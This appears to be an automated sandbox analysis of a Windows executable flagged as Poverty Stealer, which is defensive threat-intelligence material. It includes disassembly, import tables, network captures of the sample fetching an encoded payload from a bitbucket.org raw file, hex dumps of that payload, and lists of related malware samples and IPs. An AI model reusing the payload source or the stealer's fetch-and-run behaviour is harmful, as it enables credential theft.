                            • 185.166.143.48
                            http://getgreenshot.orgGet hashmaliciousUnknownBrowse
                            • 185.166.143.48
                            MqJtm7S3o1.docGet hashmaliciousRedLineBrowse
                            • 185.166.143.49
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            AMAZON-02USsh4.elfGet hashmaliciousMiraiBrowse
                            • 18.180.172.177
                            arm.elfGet hashmaliciousMiraiBrowse
                            • 18.182.140.102
                            m68k.elfGet hashmaliciousMiraiBrowse
                            • 18.227.209.61
                            mpsl.elfGet hashmaliciousMiraiBrowse
                            • 18.141.95.254
                            spc.elfGet hashmaliciousMiraiBrowse
                            • 18.190.141.61
                            arm7.elfGet hashmaliciousMiraiBrowse
                            • 13.53.253.2
                            ppc.elfGet hashmaliciousMiraiBrowse
                            • 13.127.50.187
                            x86.elfGet hashmaliciousMiraiBrowse
                            • 13.125.44.240
                            na.elfGet hashmaliciousPrometeiBrowse
                            • 54.171.230.55
                            combined.exeGet hashmaliciousUnknownBrowse
                            • 52.219.152.12
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            37f463bf4616ecd445d4a1937da06e19SwitchAutoSetup_v0.7.0.3.exeGet hashmaliciousVidarBrowse
                            • 185.166.143.48
                            SecuriteInfo.com.Variant.Zusy.582702.20219.11785.exeGet hashmaliciousUnknownBrowse
                            • 185.166.143.48
                            SecuriteInfo.com.Variant.Zusy.582702.20219.11785.exeGet hashmaliciousUnknownBrowse
                            • 185.166.143.48
                            Magic_V_pro_setup_stable_latest_release_version_9_709.exeGet hashmaliciousLummaC StealerBrowse
                            • 185.166.143.48
                            Magic_V_pro_setup_stable_latest_release_version_9_709.exeGet hashmaliciousLummaC StealerBrowse
                            • 185.166.143.48
                            1.exeGet hashmaliciousUnknownBrowse
                            • 185.166.143.48
                            1.exeGet hashmaliciousUnknownBrowse
                            • 185.166.143.48
                            BWllpq4Tel.exeGet hashmaliciousGuLoaderBrowse
                            • 185.166.143.48
                            uK5pfobYyD.exeGet hashmaliciousDarkCloudBrowse
                            • 185.166.143.48
                            MNLS4PjscF.exeGet hashmaliciousGuLoaderBrowse
                            • 185.166.143.48
                            No context
                            No created / dropped files found
                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Entropy (8bit):6.578552636544814
                            TrID:
                            • Win32 Executable (generic) a (10002005/4) 99.96%
                            • Generic Win/DOS Executable (2004/3) 0.02%
                            • DOS Executable Generic (2002/1) 0.02%
                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                            File name:SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exe
                            File size:263'168 bytes
                            MD5:f9fe873316a74e0d1c93357a904e133f
                            SHA1:d8a4387af178c7d9b4710c433d6d5c37b89c3d01
                            SHA256:b6cbf3bb81c4b91c2aa4552b4767106b9e9510e9e0cc21053913849882609e0c
                            SHA512:f2b7ee2311896b27dc7bb86e8053130cbd903b3d1c0ef4c0788d46dfb9facc5757e21f611bcada16dc9bef567509e810b01c1ae79002aced8942dd04ba8fae80
                            SSDEEP:6144:cqvwbHMtaRWwVa2+B1fUaio83mMXSrlGhAOZpEBv:cqvwbPWwU2+XHkxhlEB
                            TLSH:2D448F01B5D1C872D972057158B4ABB95A3EB9200F7099FB53D41F3ECE706C0AB73A6A
                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......o...+...+...+...`.......`.......`...1...:K..=...:K..9...:K..d...`.......+...O....K..)....K..*...Rich+...........PE..L....M.g...
                            Icon Hash:90cececece8e8eb0
                            Entrypoint:0x40d289
                            Entrypoint Section:.text
                            Digitally signed:false
                            Imagebase:0x400000
                            Subsystem:windows gui
                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                            Time Stamp:0x67CB4DAD [Fri Mar 7 19:49:01 2025 UTC]
                            TLS Callbacks:
                            CLR (.Net) Version:
                            OS Version Major:6
                            OS Version Minor:0
                            File Version Major:6
                            File Version Minor:0
                            Subsystem Version Major:6
                            Subsystem Version Minor:0
                            Import Hash:db3aeeba15dbf2707fad3ba5becf2830
                            Instruction
                            call 00007FF915233149h
                            jmp 00007FF91523284Fh
                            cmp ecx, dword ptr [0043F040h]
                            jne 00007FF9152329D3h
                            ret
                            jmp 00007FF91523326Fh
                            push ebp
                            mov ebp, esp
                            and dword ptr [0044033Ch], 00000000h
                            sub esp, 28h
                            or dword ptr [0043F018h], 01h
                            push 0000000Ah
                            call dword ptr [0042C058h]
                            test eax, eax
                            je 00007FF915232CDBh
                            push ebx
                            push esi
                            push edi
                            xor eax, eax
                            lea edi, dword ptr [ebp-28h]
                            xor ecx, ecx
                            push ebx
                            cpuid
                            mov esi, ebx
                            pop ebx
                            nop
                            mov dword ptr [edi], eax
                            mov dword ptr [edi+04h], esi
                            mov dword ptr [edi+08h], ecx
                            xor ecx, ecx
                            mov dword ptr [edi+0Ch], edx
                            mov eax, dword ptr [ebp-28h]
                            mov edi, dword ptr [ebp-24h]
                            mov dword ptr [ebp-04h], eax
                            xor edi, 756E6547h
                            mov eax, dword ptr [ebp-1Ch]
                            xor eax, 49656E69h
                            mov dword ptr [ebp-18h], eax
                            mov eax, dword ptr [ebp-20h]
                            xor eax, 6C65746Eh
                            mov dword ptr [ebp-14h], eax
                            xor eax, eax
                            inc eax
                            push ebx
                            cpuid
                            mov esi, ebx
                            pop ebx
                            nop
                            lea ebx, dword ptr [ebp-28h]
                            mov dword ptr [ebx], eax
                            mov eax, dword ptr [ebp-18h]
                            or eax, dword ptr [ebp-14h]
                            or eax, edi
                            mov dword ptr [ebx+04h], esi
                            mov dword ptr [ebx+08h], ecx
                            mov dword ptr [ebx+0Ch], edx
                            jne 00007FF915232A0Bh
                            mov eax, dword ptr [ebp-28h]
                            and eax, 0FFF3FF0h
                            cmp eax, 000106C0h
                            je 00007FF9152329F5h
                            cmp eax, 00020660h
                            je 00007FF9152329EEh
                            cmp eax, 00020670h
                            je 00007FF9152329E7h
                            cmp eax, 00030650h
                            je 00007FF9152329E0h
                            cmp eax, 00000660h
                            NameVirtual AddressVirtual Size Is in Section
                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IMPORT0x3da500x3c.rdata
                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x410000x21f0.reloc
                            IMAGE_DIRECTORY_ENTRY_DEBUG0x3b1900x70.rdata
                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                            IMAGE_DIRECTORY_ENTRY_TLS0x3b2000x18.rdata
                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x3b0d00x40.rdata
                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IAT0x2c0000x140.rdata
                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                            .text0x10000x2a8710x2aa005d92a4c0393a8d49e1de7f6b64ebe6abFalse0.5427339167888563data6.657676969668933IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            .rdata0x2c0000x121760x12200f434dfe0511959e8280c5a216e08dd8cFalse0.4938981681034483data5.625546128839358IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                            .data0x3f0000x1f580x1200ec2b0f8bccfefd6305027b3795d46b1aFalse0.1937934027777778DOS executable (block device driver \377\377\377\377)3.127900718317494IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .reloc0x410000x21f00x2200506afc22f15df7ff611ca73eb0f3cce4False0.7635569852941176data6.598006424266324IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                            DLLImport
                            KERNEL32.dllGetCurrentProcess, GetModuleHandleA, Sleep, LoadLibraryA, CloseHandle, GetProcAddress, FreeLibrary, GetTickCount, CreateFileW, HeapSize, SetStdHandle, WideCharToMultiByte, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionEx, DeleteCriticalSection, EncodePointer, DecodePointer, MultiByteToWideChar, LCMapStringEx, GetStringTypeW, GetCPInfo, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, GetModuleHandleW, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, RtlUnwind, RaiseException, GetLastError, SetLastError, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, ExitProcess, GetModuleHandleExW, GetModuleFileNameW, GetStdHandle, WriteFile, HeapAlloc, HeapFree, GetFileType, LCMapStringW, GetLocaleInfoW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, FlushFileBuffers, GetConsoleOutputCP, GetConsoleMode, ReadFile, GetFileSizeEx, SetFilePointerEx, ReadConsoleW, HeapReAlloc, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, GetProcessHeap, WriteConsoleW
                            USER32.dllMessageBoxW

                            Download Network PCAP: filteredfull

                            • Total Packets: 19
                            • 443 (HTTPS)
                            • 53 (DNS)
                            TimestampSource PortDest PortSource IPDest IP
                            Mar 8, 2025 23:24:24.454685926 CET49707443192.168.2.5185.166.143.48
                            Mar 8, 2025 23:24:24.454740047 CET44349707185.166.143.48192.168.2.5
                            Mar 8, 2025 23:24:24.454830885 CET49707443192.168.2.5185.166.143.48
                            Mar 8, 2025 23:24:24.465926886 CET49707443192.168.2.5185.166.143.48
                            Mar 8, 2025 23:24:24.465941906 CET44349707185.166.143.48192.168.2.5
                            Mar 8, 2025 23:24:26.188783884 CET44349707185.166.143.48192.168.2.5
                            Mar 8, 2025 23:24:26.188889027 CET49707443192.168.2.5185.166.143.48
                            Mar 8, 2025 23:24:26.541248083 CET49707443192.168.2.5185.166.143.48
                            Mar 8, 2025 23:24:26.541285992 CET44349707185.166.143.48192.168.2.5
                            Mar 8, 2025 23:24:26.541790009 CET44349707185.166.143.48192.168.2.5
                            Mar 8, 2025 23:24:26.541847944 CET49707443192.168.2.5185.166.143.48
                            Mar 8, 2025 23:24:26.544790983 CET49707443192.168.2.5185.166.143.48
                            Mar 8, 2025 23:24:26.588331938 CET44349707185.166.143.48192.168.2.5
                            Mar 8, 2025 23:24:27.183301926 CET44349707185.166.143.48192.168.2.5
                            Mar 8, 2025 23:24:27.183343887 CET44349707185.166.143.48192.168.2.5
                            Mar 8, 2025 23:24:27.183353901 CET44349707185.166.143.48192.168.2.5
                            Mar 8, 2025 23:24:27.183403969 CET49707443192.168.2.5185.166.143.48
                            Mar 8, 2025 23:24:27.183425903 CET44349707185.166.143.48192.168.2.5
                            Mar 8, 2025 23:24:27.183458090 CET49707443192.168.2.5185.166.143.48
                            Mar 8, 2025 23:24:27.183495998 CET49707443192.168.2.5185.166.143.48
                            Mar 8, 2025 23:24:27.258419037 CET44349707185.166.143.48192.168.2.5
                            Mar 8, 2025 23:24:27.258474112 CET44349707185.166.143.48192.168.2.5
                            Mar 8, 2025 23:24:27.258546114 CET49707443192.168.2.5185.166.143.48
                            Mar 8, 2025 23:24:27.258558035 CET44349707185.166.143.48192.168.2.5
                            Mar 8, 2025 23:24:27.258717060 CET49707443192.168.2.5185.166.143.48
                            Mar 8, 2025 23:24:27.258717060 CET49707443192.168.2.5185.166.143.48
                            Mar 8, 2025 23:24:27.258728981 CET44349707185.166.143.48192.168.2.5
                            Mar 8, 2025 23:24:27.258785009 CET49707443192.168.2.5185.166.143.48
                            Mar 8, 2025 23:24:27.284504890 CET44349707185.166.143.48192.168.2.5
                            Mar 8, 2025 23:24:27.284575939 CET44349707185.166.143.48192.168.2.5
                            Mar 8, 2025 23:24:27.284693003 CET44349707185.166.143.48192.168.2.5
                            Mar 8, 2025 23:24:27.284715891 CET49707443192.168.2.5185.166.143.48
                            Mar 8, 2025 23:24:27.284715891 CET49707443192.168.2.5185.166.143.48
                            Mar 8, 2025 23:24:27.284753084 CET49707443192.168.2.5185.166.143.48
                            Mar 8, 2025 23:24:27.284990072 CET49707443192.168.2.5185.166.143.48
                            Mar 8, 2025 23:24:27.285011053 CET44349707185.166.143.48192.168.2.5
                            TimestampSource PortDest PortSource IPDest IP
                            Mar 8, 2025 23:24:24.439620018 CET6176753192.168.2.51.1.1.1
                            Mar 8, 2025 23:24:24.447052956 CET53617671.1.1.1192.168.2.5
                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                            Mar 8, 2025 23:24:24.439620018 CET192.168.2.51.1.1.10xc33fStandard query (0)bitbucket.orgA (IP address)IN (0x0001)false
                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                            Mar 8, 2025 23:24:24.447052956 CET1.1.1.1192.168.2.50xc33fNo error (0)bitbucket.org185.166.143.48A (IP address)IN (0x0001)false
                            Mar 8, 2025 23:24:24.447052956 CET1.1.1.1192.168.2.50xc33fNo error (0)bitbucket.org185.166.143.49A (IP address)IN (0x0001)false
                            Mar 8, 2025 23:24:24.447052956 CET1.1.1.1192.168.2.50xc33fNo error (0)bitbucket.org185.166.143.50A (IP address)IN (0x0001)false
                            • bitbucket.org
                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            0192.168.2.549707185.166.143.484438300C:\Users\user\Desktop\SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exe
                            TimestampBytes transferredDirectionData
                            2025-03-08 22:24:26 UTC164OUTGET /microsoftingsoftwares/faw/raw/35a4772e22b353e621019b578e4e1bce5ba5d748/settings HTTP/1.1
                            Accept: */*
                            User-Agent: Chrome/95.0.4638.54
                            Host: bitbucket.org
                            2025-03-08 22:24:27 UTC5107INHTTP/1.1 200 OK
                            Date: Sat, 08 Mar 2025 22:24:26 GMT
                            Content-Type: text/plain
                            Content-Length: 40280
                            Server: AtlassianEdge
                            Vary: Authorization, Accept-Language, Origin, Accept-Encoding
                            Cache-Control: s-maxage=900, max-age=900
                            Last-Modified: Sat, 08 Mar 2025 08:40:02 GMT
                            Etag: "ff3a083964c08b9e6cd494d0ba24307b"
                            X-Used-Mesh: False
                            Content-Language: en
                            X-View-Name: bitbucket.apps.repo2.views.filebrowse_raw
                            X-Dc-Location: Micros-3
                            X-Served-By: f2c19e895aef
                            X-Version: 1326d250ea44
                            X-Static-Version: 1326d250ea44
                            X-Request-Count: 147
                            X-Render-Time: 0.06316137313842773
                            X-B3-Traceid: 7d750533d8b1458e8101d7c09f02fa1d
                            X-B3-Spanid: e43b765da1c42613
                            X-Frame-Options: SAMEORIGIN
                            Content-Security-Policy: object-src 'none'; style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com/ https://cdn.cookielaw.org/ https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-exp.prod-east.frontend.public.atl-paas.net app.pendo.io cdn.pendo.io pendo-static-6291417196199936.storage.googleapis.com https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/; base-uri 'self'; frame-ancestors 'self' start.atlassian.com start.stg.atlassian.com atlaskit.atlassian.com bitbucket.org app.pendo.io; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net atlassianblog.wpengine.com id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci [TRUNCATED]
                            X-Usage-Quota-Remaining: 998018.043
                            X-Usage-Request-Cost: 1816.07
                            X-Usage-User-Time: 0.030039
                            X-Usage-System-Time: 0.008443
                            X-Usage-Input-Ops: 64
                            X-Usage-Output-Ops: 0
                            Age: 0
                            Accept-Ranges: bytes
                            X-Cache: MISS
                            X-Content-Type-Options: nosniff
                            X-Xss-Protection: 1; mode=block
                            Atl-Traceid: 7d750533d8b1458e8101d7c09f02fa1d
                            Atl-Request-Id: 7d750533-d8b1-458e-8101-d7c09f02fa1d
                            Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                            Report-To: {"endpoints": [{"url": "https://dz8aopenkvv6s.cloudfront.net"}], "group": "endpoint-1", "include_subdomains": true, "max_age": 600}
                            Nel: {"failure_fraction": 0.001, "include_subdomains": true, "max_age": 600, "report_to": "endpoint-1"}
                            Server-Timing: atl-edge;dur=172,atl-edge-internal;dur=3,atl-edge-upstream;dur=170,atl-edge-pop;desc="aws-eu-central-1"
                            Connection: close
                            2025-03-08 22:24:27 UTC11277INData Raw: 74 76 51 71 7d 7d 2f 7d 7d 7d 7d 65 7d 7d 7d 7d 40 40 38 7d 7d 6c 47 7d 7d 7d 7d 7d 7d 7d 7d 7d 71 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 59 7d 7d 7d 7d 7d 34 46 55 47 34 7d 54 7d 4e 6e 69 42 47 7b 74 2f 30 48 76 7e 48 50 2d 59 7b 57 2d 4d 39 4e 2d 4d 66 54 69 7e 6e 48 42 4d 35 56 44 63 7b 49 3e 73 7b 59 44 77 34 47 3c 77 34 47 72 65 39 74 69 7e 31 56 3e 7e 75 55 64 71 30 6b 6a 7d 7d 7d 7d 7d 7d 7d 7d 7d 63 6c 74 72 70 71 5a 59 58 39 47 38 38 53 46 7c 70 70 6c 68 32 64 52 68 66 21 47 53 30 53 46 7c 70 7e 76 6f 36 64 58 63 58 39 47 38 38 53 46 69 70 4d 6c 68 32 64 4f 78 66 30 47 53 65 53 46 7c 6f 48 2d 78 21 63 5a 49 58 39 47 31 6a 50 7c 32 4a 70 6c 68 32
                            Data Ascii: tvQq}}/}}}}e}}}}@@8}}lG}}}}}}}}}q}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}Y}}}}}4FUG4}T}NniBG{t/0Hv~HP-Y{W-M9N-MfTi~nHBM5VDc{I>s{YDw4G<w4Gre9ti~1V>~uUdq0kj}}}}}}}}}cltrpqZYX9G88SF|pplh2dRhf!GS0SF|p~vo6dXcX9G88SFipMlh2dOxf0GSeSF|oH-x!cZIX9G1jP|2Jplh2
                            2025-03-08 22:24:27 UTC16384INData Raw: 71 58 69 49 75 75 2f 36 36 55 6c 72 72 7b 7d 49 75 75 71 49 30 75 71 64 37 34 7d 47 40 47 4c 44 73 73 6c 72 46 49 6c 74 72 63 6b 63 7c 47 69 49 30 78 34 71 69 4c 66 21 69 54 66 65 65 63 6a 72 72 63 6c 72 71 58 69 49 75 75 2f 36 78 78 40 40 40 21 6e 76 42 63 6c 74 72 64 4f 57 46 4e 40 40 57 6e 66 65 69 4c 66 65 69 54 66 56 69 4c 66 37 69 6e 39 37 7d 66 30 71 69 6e 39 37 7d 6a 30 69 7c 6e 39 37 7d 6e 30 73 34 6e 39 37 7d 72 30 77 7c 6e 39 37 7d 71 70 4a 53 65 7d 7d 7d 63 64 46 45 57 68 46 4c 33 50 54 47 7d 7d 7d 69 54 66 66 69 70 7d 7b 69 4c 66 66 69 54 66 66 7e 3c 6c 71 70 58 4d 49 75 78 7d 36 3c 2f 7d 7d 7d 63 6c 72 72 73 64 57 7d 73 6a 72 72 73 6c 72 72 73 6b 71 70 59 69 72 2d 64 50 4a 7d 7d 7d 7d 69 54 66 66 69 70 7d 7b 69 4c 66 66 69 54 66 66 69 54 7d
                            Data Ascii: qXiIuu/66Ulrr{}IuuqI0uqd74}G@GLDsslrFIltrckc|GiI0x4qiLf!iTfeecjrrclrqXiIuu/6xx@@@!nvBcltrdOWFN@@WnfeiLfeiTfViLf7in97}f0qin97}j0i|n97}n0s4n97}r0w|n97}qpJSe}}}cdFEWhFL3PTG}}}iTffip}{iLffiTff~<lqpXMIux}6</}}}clrrsdW}sjrrslrrskqpYir-dPJ}}}}iTffip}{iLffiTffiT}
                            2025-03-08 22:24:27 UTC521INData Raw: 78 2d 69 49 38 39 68 49 75 33 57 36 57 3c 6c 59 34 4c 44 38 65 6f 6c 66 6c 6b 6c 38 4f 54 66 39 69 68 4d 7d 70 5a 40 40 34 68 49 40 57 2f 7d 7d 69 53 65 49 69 54 6e 40 63 75 7d 40 70 40 40 7d 40 64 7b 34 71 51 6c 72 46 71 6c 30 7c 4c 31 36 69 54 31 37 69 4b 75 53 69 56 71 49 30 78 57 56 56 38 64 7d 7d 63 6c 7b 69 69 4a 58 47 56 7b 49 30 33 57 49 71 73 6b 49 30 33 38 49 57 73 6b 69 38 7c 6c 72 45 49 6a 7b 69 50 7b 49 30 78 34 6b 38 7e 6a 74 46 59 64 21 7d 7e 6c 72 46 47 70 48 5a 4a 40 40 40 39 46 78 4c 55 6c 35 76 33 64 76 7c 56 53 75 34 56 3e 2f 38 63 6c 74 71 58 77 49 33 75 69 47 73 73 74 40 57 2f 7d 7d 66 45 6e 64 69 30 65 7d 7d 7d 7d 49 40 37 7b 36 71 6c 5a 51 34 31 36 40 38 44 7e 7b 7d 69 7d 7d 7d 63 66 40 33 47 38 49 57 59 37 49 38 68 7b 36 7d 51 7b
                            Data Ascii: x-iI89hIu3W6W<lY4LD8eolflkl8OTf9ihM}pZ@@4hI@W/}}iSeIiTn@cu}@p@@}@d{4qQlrFql0|L16iT17iKuSiVqI0xWVV8d}}cl{iiJXGV{I03WIqskI038IWski8|lrEIj{iP{I0x4k8~jtFYd!}~lrFGpHZJ@@@9FxLUl5v3dv|VSu4V>/8cltqXwI3uiGsst@W/}}fEndi0e}}}}I@7{6qlZQ416@8D~{}i}}}cf@3G8IWY7I8h{6}Q{
                            2025-03-08 22:24:27 UTC12098INData Raw: 77 34 72 4a 54 31 65 68 6c 4e 78 31 35 42 49 21 76 44 57 31 77 6c 37 69 70 53 73 66 6e 77 49 33 75 71 49 38 66 78 49 33 30 2f 49 76 78 38 49 31 75 69 76 4c 45 6a 72 46 4a 4f 7d 40 33 40 40 34 56 7c 77 76 4d 66 32 33 72 71 2f 39 6a 63 6f 39 50 31 7e 7c 53 7e 49 38 4f 4c 40 57 2f 7d 7d 7d 39 66 59 69 2f 4d 7d 69 47 78 49 72 73 6f 49 7b 71 35 36 5a 63 6c 30 34 56 6f 36 6c 68 39 40 40 40 40 44 46 59 6e 72 42 49 6c 5a 4c 63 6e 75 40 37 4f 49 40 37 40 40 40 39 31 21 69 31 66 55 69 56 78 40 33 78 38 49 38 35 71 36 6f 5a 21 40 40 21 64 58 7b 72 46 78 4c 55 6c 35 76 33 64 3c 7d 7d 66 7d 7d 63 64 57 71 71 5a 30 55 4a 76 31 56 40 40 77 2d 6f 6c 57 44 68 4f 75 34 52 3c 55 4c 76 76 7d 7d 7d 4a 59 49 70 63 7d 38 4b 6c 57 42 4b 5a 2f 57 7d 7d 49 39 7d 4a 57 2d 68 51 7d
                            Data Ascii: w4rJT1ehlNx15BI!vDW1wl7ipSsfnwI3uqI8fxI30/Ivx8I1uivLEjrFJO}@3@@4V|wvMf23rq/9jco9P1~|S~I8OL@W/}}}9fYi/M}iGxIrsoI{q56Zcl04Vo6lh9@@@@DFYnrBIlZLcnu@7OI@7@@@91!i1fUiVx@3x8I85q6oZ!@@!dX{rFxLUl5v3d<}}f}}cdWqqZ0UJv1V@@w-olWDhOu4R<ULvv}}}JYIpc}8KlWBKZ/W}}I9}JW-hQ}


                            Click to jump to process

                            Click to jump to process

                            Target ID:0
                            Start time:17:24:22
                            Start date:08/03/2025
                            Path:C:\Users\user\Desktop\SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exe"
                            Imagebase:0x300000
                            File size:263'168 bytes
                            MD5 hash:F9FE873316A74E0D1C93357A904E133F
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_PovertyStealer, Description: Yara detected Poverty Stealer, Source: 00000000.00000003.1420376353.0000000002F04000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_PovertyStealer, Description: Yara detected Poverty Stealer, Source: 00000000.00000003.1420412965.0000000002EBC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                            Reputation:low
                            Has exited:true
                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                            Execution Graph

                            Execution Coverage

                            Dynamic/Packed Code Coverage

                            Signature Coverage

                            Execution Coverage:5.6%
                            Dynamic/Decrypted Code Coverage:0%
                            Signature Coverage:1.8%
                            Total number of Nodes:2000
                            Total number of Limit Nodes:60
                            Show Legend
                            Hide Nodes/Edges
                            execution_graph 21127 30c133 21129 30c149 _Yarn 21127->21129 21128 30c14f 21129->21128 21130 30c1f5 21129->21130 21133 314655 21129->21133 21130->21128 21132 314655 __fread_nolock 53 API calls 21130->21132 21132->21128 21136 314672 21133->21136 21137 31467e ___scrt_is_nonwritable_in_current_image 21136->21137 21138 314691 __fread_nolock 21137->21138 21139 3146c8 21137->21139 21148 31466d 21137->21148 21142 315b3e __dosmaperr 14 API calls 21138->21142 21149 313c57 EnterCriticalSection 21139->21149 21141 3146d2 21150 31447c 21141->21150 21144 3146ab 21142->21144 21145 3117df __fread_nolock 39 API calls 21144->21145 21145->21148 21148->21129 21149->21141 21151 31448e __fread_nolock 21150->21151 21156 3144ab 21150->21156 21152 31449b 21151->21152 21151->21156 21161 3144ec __fread_nolock 21151->21161 21153 315b3e __dosmaperr 14 API calls 21152->21153 21154 3144a0 21153->21154 21155 3117df __fread_nolock 39 API calls 21154->21155 21155->21156 21163 314707 21156->21163 21157 314617 __fread_nolock 21159 315b3e __dosmaperr 14 API calls 21157->21159 21158 31470f __fread_nolock 39 API calls 21158->21161 21159->21154 21160 31a67e __fread_nolock 39 API calls 21160->21161 21161->21156 21161->21157 21161->21158 21161->21160 21166 31da1e 21161->21166 21265 313c6b LeaveCriticalSection 21163->21265 21165 31470d 21165->21148 21167 31da30 21166->21167 21168 31da48 21166->21168 21169 315b2b __dosmaperr 14 API calls 21167->21169 21170 31dd8a 21168->21170 21175 31da8b 21168->21175 21171 31da35 21169->21171 21172 315b2b __dosmaperr 14 API calls 21170->21172 21173 315b3e __dosmaperr 14 API calls 21171->21173 21174 31dd8f 21172->21174 21178 31da3d 21173->21178 21176 315b3e __dosmaperr 14 API calls 21174->21176 21177 31da96 21175->21177 21175->21178 21183 31dac6 21175->21183 21179 31daa3 21176->21179 21180 315b2b __dosmaperr 14 API calls 21177->21180 21178->21161 21184 3117df __fread_nolock 39 API calls 21179->21184 21181 31da9b 21180->21181 21182 315b3e __dosmaperr 14 API calls 21181->21182 21182->21179 21185 31dadf 21183->21185 21186 31db1a 21183->21186 21187 31daec 21183->21187 21184->21178 21185->21187 21191 31db08 21185->21191 21189 31977e std::_Locinfo::_Locinfo_dtor 15 API calls 21186->21189 21188 315b2b __dosmaperr 14 API calls 21187->21188 21190 31daf1 21188->21190 21192 31db2b 21189->21192 21193 315b3e __dosmaperr 14 API calls 21190->21193 21194 324971 __fread_nolock 39 API calls 21191->21194 21195 319744 ___free_lconv_mon 14 API calls 21192->21195 21196 31daf8 21193->21196 21197 31dc66 21194->21197 21199 31db34 21195->21199 21200 3117df __fread_nolock 39 API calls 21196->21200 21198 31dcda 21197->21198 21201 31dc7f GetConsoleMode 21197->21201 21203 31dcde ReadFile 21198->21203 21202 319744 ___free_lconv_mon 14 API calls 21199->21202 21228 31db03 __fread_nolock 21200->21228 21201->21198 21204 31dc90 21201->21204 21205 31db3b 21202->21205 21206 31dd52 GetLastError 21203->21206 21207 31dcf6 21203->21207 21204->21203 21209 31dc96 ReadConsoleW 21204->21209 21210 31db60 21205->21210 21211 31db45 21205->21211 21212 31dcb6 21206->21212 21213 31dd5f 21206->21213 21207->21206 21208 31dccf 21207->21208 21223 31dd32 21208->21223 21224 31dd1b 21208->21224 21208->21228 21209->21208 21216 31dcb0 GetLastError 21209->21216 21229 31dfaf 21210->21229 21218 315b3e __dosmaperr 14 API calls 21211->21218 21212->21228 21235 315ae4 21212->21235 21214 315b3e __dosmaperr 14 API calls 21213->21214 21219 